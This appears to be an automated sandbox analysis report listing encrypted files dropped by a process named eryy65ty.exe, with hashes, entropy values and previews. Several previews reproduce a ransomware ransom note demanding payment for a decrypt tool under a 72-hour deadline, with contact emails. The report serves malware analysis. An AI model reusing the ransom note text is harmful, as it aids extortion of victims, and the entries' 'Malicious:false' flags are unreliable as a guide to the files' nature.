                                                                                                    Preview:.x...1!.....QS.0P.X..c..>g:x|.;.5{.^.]....2.R%B8.{.`h......J...Y..(......>....p....@..:.N.....{6..q9.A.B.O.{'.....P*U....u, ).(..q...&M.K}x..*...C4..l.,Z........D.'.0..2.....)uB.I.q...T].(.s.."..0...........kZGe..i....W...".Q.v...vd.%.Y.4'.......GyT3.C.......FQ.......ZnYU..\...Ko.Yl.....?Vh.V|E......E.Wz.k..=...P..#..n...1....@.~'.\v.Dt_...%0.X..E.ec1..:.8s...d....%.k......\..].r...fJ...^+f.U. ....%.V._.0...,Uo...".. 5...g....@Zl.W.......+....]Qj..m./..&!..k[.bNk..$..i?...Xe.:*.A..P....k..]..i......2O1b7c.*..:...............=..XW1..m.<....w.8........~.c12...@F.....z......@....r.I'p.ZV.o.$.......w..p.>z%-.t...:..0..x......b..6%^I=v..U.E........T$.....v}..l.r.Y]........w.o5N2}....,.[~i..V.W.VK....os..v..E.:....F..5..)Y..~.....7..+..z.[......%)J..."4I.A....(=~...x....y...$..Rl.k..5vJ.[XbC...r.`....[..}t"mL.P..E......i..!....2f. ..*jg.).ZP\.c..v..9u/|.K."L.?q...w.l..P...Di......H\..59=_`6..L.agB...5.&.4 ..TU(%4.r.@.~....Ga..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84606286205516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:FDJU04nwaOVvW3RA5J4MsHuxATWJr99OHk8asZbPynApsRToXl+rDKU14lx7DWJn:xJUbj3RIZPrx8a9esD3KU1Ax7KJ
                                                                                                    MD5:75FEF8A07D33E832F1B621E04C17D0B5
                                                                                                    SHA1:7F56C530CA8EC423FF94DC5C3524E2DDD5E8C121
                                                                                                    SHA-256:904DA3DD551C0538F61C9AACD5C306C277E2AAB879BC5AE949F9D05A3CF017B5
                                                                                                    SHA-512:8D1FCF39CF68714D247BEB3C1B2008B49EC00E3BC52247E86AF288E71AC5FFE4FA2266FBB1A3B8769975E09264C88ED2FE435516865B9B12643DCEC8871B52D9
                                                                                                    Malicious:false
                                                                                                    Preview:[`g...?...h;..N..Y.xCaS.-..U:\.u.8.S.T(w..`).[.3e...A.#.9S..R.6.7^...?C.-xT..PSo..LJQ.Z[.....J.U..s.%.p.7.R..H-..(?.......o.M~p.-...g\../.T. P...t..?.D.....y._.I+...h.........].F.^......WgQ'.W...o>.`r.....l.#....Q.6*.`....)...\..I..k..[]y8+hCD.58....w.D.......?....v........0..H..a......>T..{..V.e.Se\..)..=.(......A..ll.g...Nv U/.;..z.B..u...y....Lw*..y#&&k.Z.^..x..".F....O..PK.Y..".r.k......\....%.F..0....0......M..]o^..Z...K.c.+.S..8.."..6Q...6....."..T.E....g.]...P;..t.].E......_.p. .l.'.hN..(.......9/..~)..Z..mSx..9....xC...uDm1..;..u.".+N.&u....f.....C.p........{.zN..if(...$...\9.1..d...[\.[vP."..).....l=.E.c.L.O.Vo.v..=H.=...._...a.l.A.......v?.>.....,V......Y..N....=..r[.T...ai.0...H......Y..#.C`..1.<!k..]...'K[.....J..r.......)n......g..:.7......l^.C..L..wh..-=uHu..=...t.4.t.L.ql..m..o..ac.d..S..@..**e'.......;.....+.....i.T....\...5......T.A.1.../...$....~S...U..r......b...R.^./5.ska&>.jd_.g..iQ...^4.L.1...z."..N.......n$7....5...U
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84606286205516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:FDJU04nwaOVvW3RA5J4MsHuxATWJr99OHk8asZbPynApsRToXl+rDKU14lx7DWJn:xJUbj3RIZPrx8a9esD3KU1Ax7KJ
                                                                                                    MD5:75FEF8A07D33E832F1B621E04C17D0B5
                                                                                                    SHA1:7F56C530CA8EC423FF94DC5C3524E2DDD5E8C121
                                                                                                    SHA-256:904DA3DD551C0538F61C9AACD5C306C277E2AAB879BC5AE949F9D05A3CF017B5
                                                                                                    SHA-512:8D1FCF39CF68714D247BEB3C1B2008B49EC00E3BC52247E86AF288E71AC5FFE4FA2266FBB1A3B8769975E09264C88ED2FE435516865B9B12643DCEC8871B52D9
                                                                                                    Malicious:false
                                                                                                    Preview:[`g...?...h;..N..Y.xCaS.-..U:\.u.8.S.T(w..`).[.3e...A.#.9S..R.6.7^...?C.-xT..PSo..LJQ.Z[.....J.U..s.%.p.7.R..H-..(?.......o.M~p.-...g\../.T. P...t..?.D.....y._.I+...h.........].F.^......WgQ'.W...o>.`r.....l.#....Q.6*.`....)...\..I..k..[]y8+hCD.58....w.D.......?....v........0..H..a......>T..{..V.e.Se\..)..=.(......A..ll.g...Nv U/.;..z.B..u...y....Lw*..y#&&k.Z.^..x..".F....O..PK.Y..".r.k......\....%.F..0....0......M..]o^..Z...K.c.+.S..8.."..6Q...6....."..T.E....g.]...P;..t.].E......_.p. .l.'.hN..(.......9/..~)..Z..mSx..9....xC...uDm1..;..u.".+N.&u....f.....C.p........{.zN..if(...$...\9.1..d...[\.[vP."..).....l=.E.c.L.O.Vo.v..=H.=...._...a.l.A.......v?.>.....,V......Y..N....=..r[.T...ai.0...H......Y..#.C`..1.<!k..]...'K[.....J..r.......)n......g..:.7......l^.C..L..wh..-=uHu..=...t.4.t.L.ql..m..o..ac.d..S..@..**e'.......;.....+.....i.T....\...5......T.A.1.../...$....~S...U..r......b...R.^./5.ska&>.jd_.g..iQ...^4.L.1...z."..N.......n$7....5...U
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.866303600748375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Tgwain+/dCKiyURC3sWiKtXjk9BuwoK6SS0DPq20ImZ8MFiBJIyKnZgNi9Se/c3S:Tg4KdC/HoU2A9AwfFjhb0LTnZgNiR/GS
                                                                                                    MD5:583E13BAC760A9D54BB50A4AB62B7D47
                                                                                                    SHA1:F5B188A7AD1209BE6C3FDB1BA7F2C96A7E9D08C4
                                                                                                    SHA-256:47AE4313555B266D1B83C7BFA52B4620575D407EFC314DA5AA9E3A1109A0442E
                                                                                                    SHA-512:C4E11B5E3151A3B200520ED26F9F63C49577CA683B41B9D69D819E6C0621DCB4A6D3EAF57A84C0330887B142543503E6E29616E8A3A5DCC6017B07674A2834B2
                                                                                                    Malicious:false
                                                                                                    Preview:.^..1.>8..4..^........"..4L$.Z(....3...V..G..B......,...]pY..'q..$..TJ/..c.tR..[.q...E../.-.S{<....G..."M._6..l.($.....=e.....d...,...h.Xi....Q....?&..O./..%. ...g.y..L......-.&M..Y5...m.'....`...a..i-.".2.D&.jb...<.z...C.O-...;@......~B.]N.<]sq.n........hvD99..s..{^4...!.r(..~..\.P..4.P.R....(3<..9.I...9.]s..).n}..4..~6)..h.Ojje..u../....Y.?U-.].k1^1.|...>%.....7.....G..o.. ...=M. KCVR39....F.............{..Z.0.U.Y.]t.T.z...$.c...a.....[z..'JN.s....$.I......l.t...>Il.........r.&....%....i.O...Yi..........D..vj4.......^AS.x^.'~k.b8A..-.:.e...%....!.g....$.k?..L.]3.I.mm...[0p.6..n./B.YB..v...^. .Q#..{x.h..Z./.F.q<W$G..G...qy.k.x...i.}W.hT...s....,...r_...XN..q..Wp...um..&.hNA...*.....8).Q:...R......)....q.`A.f.[.n..l.e..zN........u!.B....I..E...O.:...*...3...K...Y{.;.M..t.6...g.g5..82.e.,.-..Ot....mL..a...-.x....h.....d..o.Y....-u....Gk."..R....v.y[..h.?/.i.6.JF....+II.a.i.....!'b.w..~...s..,N..4....D.....[.<\....2K...9$=...7..Nt..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.866303600748375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Tgwain+/dCKiyURC3sWiKtXjk9BuwoK6SS0DPq20ImZ8MFiBJIyKnZgNi9Se/c3S:Tg4KdC/HoU2A9AwfFjhb0LTnZgNiR/GS
                                                                                                    MD5:583E13BAC760A9D54BB50A4AB62B7D47
                                                                                                    SHA1:F5B188A7AD1209BE6C3FDB1BA7F2C96A7E9D08C4
                                                                                                    SHA-256:47AE4313555B266D1B83C7BFA52B4620575D407EFC314DA5AA9E3A1109A0442E
                                                                                                    SHA-512:C4E11B5E3151A3B200520ED26F9F63C49577CA683B41B9D69D819E6C0621DCB4A6D3EAF57A84C0330887B142543503E6E29616E8A3A5DCC6017B07674A2834B2
                                                                                                    Malicious:false
                                                                                                    Preview:.^..1.>8..4..^........"..4L$.Z(....3...V..G..B......,...]pY..'q..$..TJ/..c.tR..[.q...E../.-.S{<....G..."M._6..l.($.....=e.....d...,...h.Xi....Q....?&..O./..%. ...g.y..L......-.&M..Y5...m.'....`...a..i-.".2.D&.jb...<.z...C.O-...;@......~B.]N.<]sq.n........hvD99..s..{^4...!.r(..~..\.P..4.P.R....(3<..9.I...9.]s..).n}..4..~6)..h.Ojje..u../....Y.?U-.].k1^1.|...>%.....7.....G..o.. ...=M. KCVR39....F.............{..Z.0.U.Y.]t.T.z...$.c...a.....[z..'JN.s....$.I......l.t...>Il.........r.&....%....i.O...Yi..........D..vj4.......^AS.x^.'~k.b8A..-.:.e...%....!.g....$.k?..L.]3.I.mm...[0p.6..n./B.YB..v...^. .Q#..{x.h..Z./.F.q<W$G..G...qy.k.x...i.}W.hT...s....,...r_...XN..q..Wp...um..&.hNA...*.....8).Q:...R......)....q.`A.f.[.n..l.e..zN........u!.B....I..E...O.:...*...3...K...Y{.;.M..t.6...g.g5..82.e.,.-..Ot....mL..a...-.x....h.....d..o.Y....-u....Gk."..R....v.y[..h.?/.i.6.JF....+II.a.i.....!'b.w..~...s..,N..4....D.....[.<\....2K...9$=...7..Nt..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.834080765047139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ShRwBM2X94a3wmYLCb6j2DY05CBLM4hxE8SF70NrD1fhcyOfX28OzSc:mRsMC1PYk62/5CBLdxE570rJc/52Sc
                                                                                                    MD5:59760D1E600007E9A525181A18783422
                                                                                                    SHA1:19EFFA952439259A155FB2E1A49B4072440317C9
                                                                                                    SHA-256:22FA422F75A7E1C74C8898F06ADBAE25503C29E0EED3494CF39F93EE4703F990
                                                                                                    SHA-512:6CF5DD203CF9FC7AB090869EE5983BBA770DC0B9208DD3D04AD147CEECBECDD06E337F0C771F9CEDB913E84F6D49401AE8EC50AF2D91F4DB62F8CACA5FD8E3C5
                                                                                                    Malicious:false
                                                                                                    Preview:.@...!.-}s5...C....OfuD..%t.....r.C,..xW9.`41....G'..UQ|y?..Lm$.*(dDB..j6..P.zW.;R.37...9Q...,aoO]"&J..M...OTM!....2..........nH..%.C..N..].......*..W.Ca...(..b...a..h$$~.DU%W!..fR.(j...^).../..UA.V}.E?!p.....y(..p....<....\H.t.@CN-M............)b.....f......{.96.l.':..L..@/]J..*..;......+^...F.......<..L.u......<Va.rJ..~...P..T....'....G).y.I../.A...Q..E{3..X....0...l.}R7)p....)ax..P..x.{.....q.....B.|..{w..a.7#.A.....4.V,.OR...7.p{....#.6.'~..\..*.!}.].[+:..wY...*R.7C..."M_.D.....a....ww.<bp..9yWN.1|.(..w<...n.^.o j..3./.kI.#..'.O.8?*..8u.=......MND........L.N.|.EbU.....aM..1.uB...$jg..>....S..1#~......&.g./C....6 ....p...c...F.$..\..F.W6..O.....}..Jw.O[7..T.......w..#Y../Dp.L..,..O.....P>.....aX....l9.ZJ..^.ue*M.2..5A.z}...)..wXoAZjc]..*.....u".Q....UL.Z.Dr........=..D8....\'^..SC.k....z2.k.H...b......)V..........b...C.v..8...&.I].uk..S>|.!>....l..I.~Z`.z..A...>6t.L..@..3..I.F.B.9a.]..9..@`..g......$Q.-..Cahv.A...}...aY..~m.C..P..MD..t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.834080765047139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ShRwBM2X94a3wmYLCb6j2DY05CBLM4hxE8SF70NrD1fhcyOfX28OzSc:mRsMC1PYk62/5CBLdxE570rJc/52Sc
                                                                                                    MD5:59760D1E600007E9A525181A18783422
                                                                                                    SHA1:19EFFA952439259A155FB2E1A49B4072440317C9
                                                                                                    SHA-256:22FA422F75A7E1C74C8898F06ADBAE25503C29E0EED3494CF39F93EE4703F990
                                                                                                    SHA-512:6CF5DD203CF9FC7AB090869EE5983BBA770DC0B9208DD3D04AD147CEECBECDD06E337F0C771F9CEDB913E84F6D49401AE8EC50AF2D91F4DB62F8CACA5FD8E3C5
                                                                                                    Malicious:false
                                                                                                    Preview:.@...!.-}s5...C....OfuD..%t.....r.C,..xW9.`41....G'..UQ|y?..Lm$.*(dDB..j6..P.zW.;R.37...9Q...,aoO]"&J..M...OTM!....2..........nH..%.C..N..].......*..W.Ca...(..b...a..h$$~.DU%W!..fR.(j...^).../..UA.V}.E?!p.....y(..p....<....\H.t.@CN-M............)b.....f......{.96.l.':..L..@/]J..*..;......+^...F.......<..L.u......<Va.rJ..~...P..T....'....G).y.I../.A...Q..E{3..X....0...l.}R7)p....)ax..P..x.{.....q.....B.|..{w..a.7#.A.....4.V,.OR...7.p{....#.6.'~..\..*.!}.].[+:..wY...*R.7C..."M_.D.....a....ww.<bp..9yWN.1|.(..w<...n.^.o j..3./.kI.#..'.O.8?*..8u.=......MND........L.N.|.EbU.....aM..1.uB...$jg..>....S..1#~......&.g./C....6 ....p...c...F.$..\..F.W6..O.....}..Jw.O[7..T.......w..#Y../Dp.L..,..O.....P>.....aX....l9.ZJ..^.ue*M.2..5A.z}...)..wXoAZjc]..*.....u".Q....UL.Z.Dr........=..D8....\'^..SC.k....z2.k.H...b......)V..........b...C.v..8...&.I].uk..S>|.!>....l..I.~Z`.z..A...>6t.L..@..3..I.F.B.9a.]..9..@`..g......$Q.-..Cahv.A...}...aY..~m.C..P..MD..t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1315
                                                                                                    Entropy (8bit):7.891853640804863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ImmHswri/tWpDZ8HdaM5MlFUY65sRHp3PTuGQRWWagkkYACXHewcz0WWuT:Imk7mKW7WIFuJ3bEEWaDAqlc5T
                                                                                                    MD5:B1966650FA632A145F6048461ADADEF6
                                                                                                    SHA1:C350C39C10B0B45971814A639CBC37255A317575
                                                                                                    SHA-256:85EE0AC161FA9421E3CF482A6EC4802FB6492B80A19E0AEBDFAEA0F453217194
                                                                                                    SHA-512:CCF4633BF990AD1BB7C0678EF32A4D550B2FF45776794F30CAE4476A909E75CC9AE3F2DA8BDF3DE9BA2342F465A475453BAEB6DA091604E5556AB95E1E61018D
                                                                                                    Malicious:false
                                                                                                    Preview:$7..B..q.^A......5..G..t}!(K ...=..(ey#.Phg..q{..0...Z..:K(d..FJ..._Y..Bm7lx.G.p!C......M../s.\p>B.....j8..T.b.;...].?.J..O..~#@O4b.."...........G./.....Er.5.L......nj.6......%.....e3..J....{I.a.-.Csy.......t..9.N.z...3A^.....N.2.1..Y..P/.~x..b9.$B..t\7M..$Y9..O..r.>..AsY.../3N.Y^...r.....h..j..Di. ..r88....J;.=......c...n..^f..b1..#X5.".L....n......].&.PS...4.,....%.L.....@...S0..y->...VbCe3lh.....5.c......< .......N..rX...q....Se...,..3./y..*...To.....;.%-.H..2.&'|......k.|..?.lP.6.......i..y.+.61.[..,.G..$..#9@..2s..,p.z...j=....'E.'. ..Z.....D..f...'w...Q..8yj.I^*S.?..H.M...d.......kH.H.,....z..ia..Y.`.~.*_..L..=.......r......I,h.L........mb.....x......../.............Y...^t.U..^.......M...G.{D."......4.b.Wk.'.!{;o.9..Ulo.;#...NJ..y*..m.....(M.....n/N..[..F6.p..u....;.S...q...D.......a..KD......n.^ 4...%0..e..Q.."z...(.P......7.DFR>..<...L.t..k..1J?.....\/...%P!..pUxa..N-.......AU.:.+..^...c.a.&.`..._..!d.[..{M:.g.U+..Le..E.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1315
                                                                                                    Entropy (8bit):7.891853640804863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ImmHswri/tWpDZ8HdaM5MlFUY65sRHp3PTuGQRWWagkkYACXHewcz0WWuT:Imk7mKW7WIFuJ3bEEWaDAqlc5T
                                                                                                    MD5:B1966650FA632A145F6048461ADADEF6
                                                                                                    SHA1:C350C39C10B0B45971814A639CBC37255A317575
                                                                                                    SHA-256:85EE0AC161FA9421E3CF482A6EC4802FB6492B80A19E0AEBDFAEA0F453217194
                                                                                                    SHA-512:CCF4633BF990AD1BB7C0678EF32A4D550B2FF45776794F30CAE4476A909E75CC9AE3F2DA8BDF3DE9BA2342F465A475453BAEB6DA091604E5556AB95E1E61018D
                                                                                                    Malicious:false
                                                                                                    Preview:$7..B..q.^A......5..G..t}!(K ...=..(ey#.Phg..q{..0...Z..:K(d..FJ..._Y..Bm7lx.G.p!C......M../s.\p>B.....j8..T.b.;...].?.J..O..~#@O4b.."...........G./.....Er.5.L......nj.6......%.....e3..J....{I.a.-.Csy.......t..9.N.z...3A^.....N.2.1..Y..P/.~x..b9.$B..t\7M..$Y9..O..r.>..AsY.../3N.Y^...r.....h..j..Di. ..r88....J;.=......c...n..^f..b1..#X5.".L....n......].&.PS...4.,....%.L.....@...S0..y->...VbCe3lh.....5.c......< .......N..rX...q....Se...,..3./y..*...To.....;.%-.H..2.&'|......k.|..?.lP.6.......i..y.+.61.[..,.G..$..#9@..2s..,p.z...j=....'E.'. ..Z.....D..f...'w...Q..8yj.I^*S.?..H.M...d.......kH.H.,....z..ia..Y.`.~.*_..L..=.......r......I,h.L........mb.....x......../.............Y...^t.U..^.......M...G.{D."......4.b.Wk.'.!{;o.9..Ulo.;#...NJ..y*..m.....(M.....n/N..[..F6.p..u....;.S...q...D.......a..KD......n.^ 4...%0..e..Q.."z...(.P......7.DFR>..<...L.t..k..1J?.....\/...%P!..pUxa..N-.......AU.:.+..^...c.a.&.`..._..!d.[..{M:.g.U+..Le..E.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.098255891974506
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:n8QctDaVborEVJ6nfJ829gGu7tFON61e8fDXW2gENcDiNo7gRwp99eUHn:n8vaVkrEVJE+CAde8rXWEcGMBpOUHn
                                                                                                    MD5:28A7B6213F50B3F96786B05BA0E5F5DF
                                                                                                    SHA1:AA172FA3A4441D6931FBB855D30D2754856DBFD9
                                                                                                    SHA-256:FC3CA0FD32783DF56B32476E3A8598A9BE8E6D4D5F7C8599FDF0094657795834
                                                                                                    SHA-512:D096F6C0A01F51C3F5A287ED14904F6E8C047B8DA1FF887E3E2839CD8321E4F259ABB4396649E7F5EC25414BC29B630395E41F9FEB2974EA82C35863274DDAD4
                                                                                                    Malicious:false
                                                                                                    Preview:.kP.p..7.Jl..|t...........r1.. .....+Z.>...........(.<...o.kY..Z{R.H..A.a.u.T.}.y._..L...C_..a.........|.x...:5\W.O..gZ..^...L..d,.h.P#.^...?]G.......W.`.l ..<.\.?.m..H.j`..a......f.:.a...n,...+........i.C.0.......1..85.G.........KnA.B..Ht.xsO.|.&.....E.....ZA.1...I0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.237406352405159
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:bs/lLVxZMPZIxBFgxxDYqEH7v/pQCuzInfcF2FKMnjJ9/doF1XFAwn:Q/p+PZBxDYqkv/yNalcoz/dMFiwn
                                                                                                    MD5:615C5A7D5AFB12591DECD703A8AD5FC9
                                                                                                    SHA1:4C379F02E0FDD95BF140065B930DCDC45752EF45
                                                                                                    SHA-256:EB73BE5FD02BAE943EC2C9B39F066BE361B8FAC4CCBD593F826E69F24E81CCD5
                                                                                                    SHA-512:77BF3997AEC6A6C40CF535ABE440E7E2EBAD9592984CD602516D8BFCDF34497E41E35348A8AD3852E29AEE1C8374819374C825A9000C16C66047ED33D9CAF01D
                                                                                                    Malicious:false
                                                                                                    Preview:.%K........K.=T..........._...\.q..T....a...p.;..s....L..&S)..-y..^.kC.a}...V.c.5L..[].d.9yu.t.....u.bcT..m.......)6K.....7.F...!nV{....kpm..@.DF............-S.;J.....f.5....8O.r.......~7.a..Y.........eO.[....6(.u..!k.d.>... @1W,.Cq.......|j...........E....=.....P2.%...#..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.193655757821941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:r2BflB3dM3Ik9qRSL4+WdO6/RzcbbAIXhcXq8ho92bZ4TVL2Y/BkF2n:rivdiR9C+WdKl+3e2qH/+In
                                                                                                    MD5:AA8AC3B25F65E165D365D1B285879904
                                                                                                    SHA1:3AD7E3EE19784861475058BE22D436F5495ECF36
                                                                                                    SHA-256:6C4422A6F137620BE911C5471A99D08A42D119E3E0EB999DC16570371BE8956B
                                                                                                    SHA-512:29E0B7422C8480D8B046A4E0CC85174BA775BAAD0CFA24877C45EE13BFF092359798B164FF7C6BA0EFA794F96B8D9CEB2610A461F734D9F81003ADB4C5C570F6
                                                                                                    Malicious:false
                                                                                                    Preview:.)a!..3.uG..,.q..........&+......d4......e...dd.c.:.n....X...A...f.l.......\(.K\Z(.Ud&6....2C..5.....<....J.`Cn.....I8I...iP&6}b.c...i.3.G.T....]iO...N}.....|..x&?[&|U.....c.w!.........n"..IY..p#.+...-.!|..K." .iV.j.Kpqe.!.jm..x.$.$...>.o.:..jI3I.y..pX."..5.~E.K.u.J..V0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.147984950927863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YBt5ZP45FlCB/EtmYsycwNj6ltP8lvx3UU/nd4lFd6LHn:YBtk5TwMIYs4j+ilvx356gLHn
                                                                                                    MD5:5CBDBF4FC9A701883F1E95B09EFCB44F
                                                                                                    SHA1:89E3E2B8D00D3ECC91E51329894F2B3B587BFFE3
                                                                                                    SHA-256:8609EB0D976459019F1FFDA7DDE7A685602FFD879A589678F4E0D9F4D7C37FFA
                                                                                                    SHA-512:176959A9A794C95F1AB476947341C670A9FE2745D3B5F90319B1116B5E2EF1B955D256D9D2786B0D675B88A73CE73A22F82CE2173A76041290036438BE2FEF23
                                                                                                    Malicious:false
                                                                                                    Preview:.K..A...]...<P7...........`Rs...||QKC.7v..\b....I...`l'......)Y.|...=...!..3.~Bd..S#..N...1.?."...!.9.......9A43.FR....a"e.e...<+P6.r.9M.../_T.a..^y-..C..\./.[.!=.syHWc.?....T9R$..o...7.D.v.6F.5...,y.2..S.._.#....Lc..{oq=..U..uv...1.Y......]...E........o.|.....CL.|..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
